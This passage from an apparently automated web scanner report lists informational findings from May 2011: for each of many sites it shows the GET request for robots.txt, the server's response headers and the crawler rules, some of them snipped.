Connection: close

User-agent: *
Allow: *

26.962. http://www.stlbeacon.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stlbeacon.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stlbeacon.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Jan 2010 03:35:52 GMT
ETag: "663ea82-130-b34bd600"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.963. http://www.straight.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.straight.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.straight.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 07 Oct 2009 18:03:31 GMT
ETag: "380746-38b-4755c2a1fa2c0"
Accept-Ranges: bytes
Content-Length: 907
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
# more information about this file can be found at
# more info -> http://www.robotstxt.org/wc/robots.html
# syntax checking -> http://www.sxw.org.uk/computing/robots/check.html
# lines be
...[SNIP]...

26.964. http://www.strasburgrailroad.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.strasburgrailroad.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.strasburgrailroad.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:12 GMT
Server: Apache/2.0.54
Last-Modified: Sun, 11 Mar 2007 18:40:19 GMT
ETag: "60991e8-73-fd0f2ac0"
Accept-Ranges: bytes
Content-Length: 115
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /callcenter
Disallow: /ajax
Disallow: /js
Disallow: /css
Disallow: /404.php
Disallow: /test

26.965. http://www.stservicemovie.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stservicemovie.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stservicemovie.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Mar 2011 16:30:42 GMT
ETag: "1888439-63f-49d6e5140b080"
Accept-Ranges: bytes
Content-Length: 1599
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.966. http://www.studentscholarshipsearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.studentscholarshipsearch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.studentscholarshipsearch.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:43 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 18:37:14 GMT
Accept-Ranges: bytes
Content-Length: 98
Cache-Control: max-age=7200, proxy-revalidate
Expires: Tue, 03 May 2011 13:05:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi/admin/

Sitemap: http://www.studentscholarshipsearch.com/sitemap.xml

26.967. http://www.sub5zero.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sub5zero.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sub5zero.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:26:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 07 Jan 2011 04:06:48 GMT
ETag: "289f5a-67b-bf450600"
Accept-Ranges: bytes
Content-Length: 1659
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:26:05 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.968. http://www.submissiveslavegirl.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.submissiveslavegirl.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.submissiveslavegirl.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:18 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 17 Feb 2010 03:16:18 GMT
ETag: "22b0074d-18-47fc346156480"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.969. http://www.sugarslam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sugarslam.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sugarslam.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:18:14 GMT
Server: Apache/2.2
Vary: Cookie
X-UA-Compatible: IE=EmulateIE7
X-Pingback: http://www.sugarslam.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.970. http://www.superglossary.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.superglossary.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superglossary.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:58 GMT
Server: Apache
Last-Modified: Sun, 13 Mar 2011 18:46:39 GMT
ETag: "10af282-77-49e619d962ebf"
Accept-Ranges: bytes
Content-Length: 119
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /Database/

Disallow: /documents/

Allow: /

Sitemap: http://www.superglossary.com/sitemap.xml

26.971. http://www.superiorpowersports.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.superiorpowersports.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superiorpowersports.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Wed, 02 Feb 2011 17:40:21 GMT
Accept-Ranges: bytes
ETag: "68cbf440c3cb1:2384"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:43:48 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

26.972. http://www.supershoes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.supershoes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.supershoes.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Content-Location: http://www.supershoes.com/robots.txt
Last-Modified: Mon, 14 Feb 2011 16:56:45 GMT
Accept-Ranges: bytes
ETag: "c7736b2968cccb1:12e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:20:10 GMT
Connection: close

User-Agent: *
Disallow:

26.973. http://www.superstreetonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.superstreetonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superstreetonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:32:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3uyb5r55a10bwjjziynqcd45; path=/; HttpOnly
Set-Cookie: UserPuid=2310664144077945002; domain=superstreetonline.com; expires=Tue, 03-May-2061 10:32:16 GMT; path=/
Cache-Control: private
Content-Type: text/plain
Content-Length: 293

User-agent: *
Disallow: /bin/
Disallow: /aspnet_client/
Disallow: /redir/
Disallow: /controls/
Disallow: /srv/
Disallow: /*?
Disallow: /popup/
Disallow: /dropdownxml/
Disallow: /*.aspx$
Disa
...[SNIP]...

26.974. http://www.suppview.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.suppview.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suppview.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:34 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.3 mod_ssl/2.8.31 OpenSSL/0.9.8o
Last-Modified: Wed, 05 Jan 2011 19:43:56 GMT
ETag: "1fe679e-e7-4d24c9fc"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

26.975. http://www.surnamesite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.surnamesite.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.surnamesite.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:28 GMT
Server: Apache/1.3.20 (Unix) PHP/4.0.6
Last-Modified: Tue, 21 Dec 2004 19:12:20 GMT
ETag: "18a67-22-41c87594"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /images

26.976. http://www.survivaltopics.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.survivaltopics.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.survivaltopics.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:14:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.8
Last-Modified: Wed, 13 Feb 2008 23:36:11 GMT
ETag: "1440579-ae-44612a35d50c0"
Accept-Ranges: bytes
Content-Length: 174
Connection: close
Content-Type: text/plain

Sitemap: http://www.survivaltopics.com/sitemap.xml

User-agent: *
Disallow: /survivalsecretplace/

User-agent: *
Disallow: /common-content

User-agent: SBIder
Disallow: /

26.977. http://www.susanireland.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.susanireland.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.susanireland.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:53 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 19:35:57 GMT
ETag: "74060d4-217-4a15ebbd2e140"
Accept-Ranges: bytes
Content-Length: 535
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /affiliates/
Disallow: /coverletters/
Disallow: /checkout/
Disallow: /eresumeguide/
Disallow: /images/
Disallow: /interviewguide/
Disallow: /letterguide/
D
...[SNIP]...

26.978. http://www.susanwayland.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.susanwayland.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.susanwayland.com

Response

HTTP/1.0 200 OK
Content-type: text/html; charset=iso-8859-1
Content-Length: 140
Connection: close
Date: Tue, 03 May 2011 11:12:19 GMT
Server: lighttpd

User-agent: *
Disallow: /external/
Sitemap: http://www.susanwayland.com/sitemap.xml
Sitemap: http://www.susanwayland.com/sitemapupdates.xml

26.979. http://www.suzukipartshouse.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.suzukipartshouse.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suzukipartshouse.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 Apr 2011 21:14:26 GMT
Accept-Ranges: bytes
ETag: "f5ff2399dfecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:27:27 GMT
Connection: close
Content-Length: 460

User-agent: ShopWiki
Disallow: /
User-agent: IRLbot
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-Agent: OmniExplorer_Bot
Disallow: /
User-Agent: twiceler
Disallow: /
User-Agent:
...[SNIP]...

26.980. http://www.sweetiessweeps.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sweetiessweeps.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sweetiessweeps.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://sweetiessweeps.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://sweetiessweeps.com/sitemap.xml.gz

26.981. http://www.sweetness-light.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sweetness-light.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sweetness-light.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:01:36 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: W3 Total Cache/0.9.1.2
Last-Modified: Sun, 02 Mar 2008 03:07:31 GMT
Accept-Ranges: bytes
Content-Length: 246
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

Sitemap: http://sweetness-light.com/sitemap.xml
Sitemap: http://sweetness-light.com/sitemap.xml.gz# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://sweetness-ligh
...[SNIP]...

26.982. http://www.swissarmy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.swissarmy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.swissarmy.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Content-Location: http://www.swissarmy.com/robots.txt
Last-Modified: Mon, 15 Feb 2010 22:27:27 GMT
Accept-Ranges: bytes
ETag: "b314e6d8eaeca1:5897"
Server: Microsoft-IIS/6.0
servername: swiar-web02p
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Tue, 03 May 2011 11:38:05 GMT
Connection: close

User-agent: *
Disallow:

26.983. http://www.swvatoday.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.swvatoday.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.swvatoday.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 06 Dec 2010 08:04:13 GMT
ETag: "10fce1c-54-496b9556a7940"
Accept-Ranges: bytes
Content-Length: 84
Keep-Alive: timeout=2, max=149
Connection: close
Content-Type: text/plain

User-agent: TurnitinBot
Disallow: / #Will disallow all urls on your site

26.984. http://www.sytropin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sytropin.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sytropin.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:20 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 30 Aug 2010 12:57:30 GMT
ETag: "892e8d-a2-48f0a01da85dd"
Cache-Control: max-age=14400, public
Expires: Tue, 03 May 2011 14:18:23 GMT
Content-Length: 162
Age: 837

User-agent: *
Disallow: /old/
Disallow: /cgi-bin/
Disallow: /sudha/
Disallow: /sw/
Disallow: /stats/
Disallow: /hghfreetrail.html
Disallow: /splashfreetrial.html

26.985. http://www.tahoedailytribune.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tahoedailytribune.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tahoedailytribune.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 17 Feb 2010 16:06:05 GMT
Accept-Ranges: bytes
ETag: "8054ad1bebafca1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:18:46 GMT
Content-Length: 26
Age: 3191
X-Cache: HIT from swsquid01
X-Cache-Lookup: HIT from swsquid01:80
Via: 1.0 swsquid01 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Disallow:

26.986. http://www.taoofherbs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.taoofherbs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.taoofherbs.com

Response

HTTP/1.1 200 OK
Content-Length: 34
Content-Type: text/plain
Last-Modified: Tue, 12 Aug 2008 20:11:37 GMT
Accept-Ranges: bytes
ETag: "c2910a0b7fcc81:6a1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:53:53 GMT
Connection: close

User-agent: *
Disallow: /myacct

26.987. http://www.tapartoche.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tapartoche.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tapartoche.com

Response

HTTP/1.1 200 OK
Set-Cookie: 90plan=R4264301485; path=/; expires=Thu, 05-May-2011 23:43:10 GMT
Date: Tue, 03 May 2011 11:34:01 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 05 Dec 2008 12:05:53 GMT
ETag: "74410e-1b8-45d4b7fb44a91"
Accept-Ranges: bytes
Content-Length: 440
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/viewtopic.php
Disallow: /forum/viewforum.php
Disallow: /forum/index.php?
Disallow: /forum/posting.php
Disallow: /forum/groupcp.php
Disallow: /forum/search.php
Dis
...[SNIP]...

26.988. http://www.targetcenter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.targetcenter.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.targetcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/plain
Last-Modified: Thu, 22 Jan 2009 16:35:59 GMT
Accept-Ranges: bytes
ETag: "81f4a481af7cc91:67be"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:05:48 GMT
Connection: close

User-agent: *
Disallow: /bin/
Disallow: /custom/
Disallow: /includes/
Disallow: /mygreenhouse/
Disallow: /processors/
Disallow: /reports/
Disallow: /crossdomain.xml
Disallow: /redirect404er
...[SNIP]...

26.989. http://www.targetx.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.targetx.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.targetx.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:15:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.targetx.com/website/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.990. http://www.tattoo-show.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tattoo-show.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tattoo-show.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:32 GMT
Server: Apache
X-Pingback: http://www.tattoo-show.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.tattoo-show.com/sitemap.xml.gz

26.991. http://www.tbd.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tbd.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tbd.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Apr 2011 21:44:50 GMT
ETag: "4788c4c-23-4a1c51df3f880"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=300
Expires: Tue, 03 May 2011 10:31:34 GMT
Date: Tue, 03 May 2011 10:26:34 GMT
Content-Length: 35
Connection: close

User-agent: *
Disallow: /sandbox

26.992. http://www.tcoasttalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tcoasttalk.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tcoasttalk.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:57:00 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.tcoasttalk.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.993. http://www.teachingtextbooks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teachingtextbooks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teachingtextbooks.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Wed, 27 May 2009 02:57:51 GMT
Accept-Ranges: bytes
ETag: "46bb9ec76dec91:73e8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:41:05 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

26.994. http://www.teamspeak.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teamspeak.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teamspeak.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:43 GMT
Server: PhobyxCluster/0.1.4
Last-Modified: Fri, 07 Jan 2011 00:47:03 GMT
ETag: "86ddad-9e-49936f4f0e6d4"
Accept-Ranges: bytes
Content-Length: 158
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /admin/
Disallow: /modules/
Disallow: /scripts/
Disallow: /temp/
Disallow: /templates/
sitemap: http://www.teamspeak.com/sitemap.xml

26.995. http://www.techstreet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.techstreet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techstreet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:20:35 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a
Last-Modified: Mon, 18 Apr 2011 18:20:47 GMT
ETag: "d75-7352fdc0"
Accept-Ranges: bytes
Content-Length: 3445
Content-Type: text/plain
Vary: Accept-Encoding,User-Agent
Connection: close

User-agent: Twiceler
Disallow: /cgi-bin/basket
Disallow: /cgi-bin/publishers
Disallow: /cgi-bin/browsePublisher
Disallow: /cgi-bin/tellafriend
Disallow: /cgi-bin/changePass
Disallow: /cgi-bin/newAccou
...[SNIP]...

26.996. http://www.tehparadox.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tehparadox.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tehparadox.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:17:02 GMT
Content-Type: text/plain
Content-Length: 1682
Last-Modified: Sun, 18 Jul 2010 19:40:28 GMT
Connection: close
Vary: Accept-Encoding
Expires: Thu, 02 Jun 2011 10:17:02 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: Yandex
Disallow: /

User-agent: Yandex Something
Disallow: /

User-agent: Teoma
Disallow: /

User-agent: twiceler
Disallow: /

User-agent: SeznamBot
Disallow: /

User-agent
...[SNIP]...

26.997. http://www.teleportmyjob.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teleportmyjob.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teleportmyjob.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 20 May 2009 14:25:55 GMT
Accept-Ranges: bytes
ETag: "fe68e356d9c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:10 GMT
Connection: close
Content-Length: 27

User-Agent: *
Allow: /

26.998. http://www.terapad.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.terapad.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.terapad.com

Response

HTTP/1.1 200 OK
Content-Length: 25
Content-Type: text/plain
Content-Location: http://www.terapad.com/robots.txt
Last-Modified: Sun, 25 Jun 2006 12:21:58 GMT
Accept-Ranges: bytes
ETag: "f0ec6cf45198c61:6ae"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:37:02 GMT
Connection: close

User-agent: *
Disallow:

26.999. http://www.teriskitchen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teriskitchen.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teriskitchen.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:47 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Tue, 28 Aug 2001 19:11:16 GMT
ETag: "678bc3-37-3b8becd4"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /wwwstat/

26.1000. http://www.thatloser.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thatloser.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thatloser.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 24 Mar 2011 00:17:46 GMT
ETag: "19840ad4-2c-49f2f681f3e80"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /wp-content/plugins/

26.1001. http://www.the-cover-store.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.the-cover-store.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.the-cover-store.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 23 Feb 2011 15:26:29 GMT
Accept-Ranges: bytes
ETag: "65efd7a6ed3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:34:36 GMT
Connection: close
Content-Length: 22704

User-agent: *
Disallow: /item_detail.aspx?ItemCode=CSP05101BK2
Disallow: /item_detail.aspx?ItemCode=CSP05102BK2
Disallow: /item_detail.aspx?ItemCode=CSP05103BK2
Disallow: /item_detail.aspx?ItemCod
...[SNIP]...

26.1002. http://www.thebullyhouse.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thebullyhouse.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

